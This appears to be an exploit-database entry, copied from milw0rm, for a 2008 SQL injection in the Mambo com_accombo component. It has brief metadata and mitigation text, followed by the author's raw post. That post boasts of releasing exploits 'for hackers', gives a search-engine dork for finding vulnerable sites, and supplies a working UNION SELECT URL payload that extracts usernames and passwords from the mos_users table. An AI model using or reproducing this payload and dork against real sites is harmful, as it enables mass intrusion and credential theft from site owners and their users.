header-logo
Suggest Exploit
vendor:
Mambo
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mambo
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:mambo:mambo:1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mambo Component com_accombo SQL Injection

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify or delete data, or even execute commands on the underlying operating system.

Mitigation:

Input validation should be used to prevent the execution of malicious SQL statements. Additionally, the application should be configured to use the least privileged account with access to the database.
Source

Exploit-DB raw data:

##########################################
#
# Mambo Component com_accombo SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
############################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_accombo"
#
###########################################
EXPLOIT :

index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*


###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

side note:
  <name>accombo</name>
  <creationDate>29/02/2004</creationDate>
  <author>Niall McCullagh</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>mambo@glenelly.net</authorEmail>

  <authorUrl>mambo.glenelly.net</authorUrl>
  <version>1.4</version>
  <description>Accombo is a Mambo accommodation advertising component.</description>

# milw0rm.com [2008-03-19]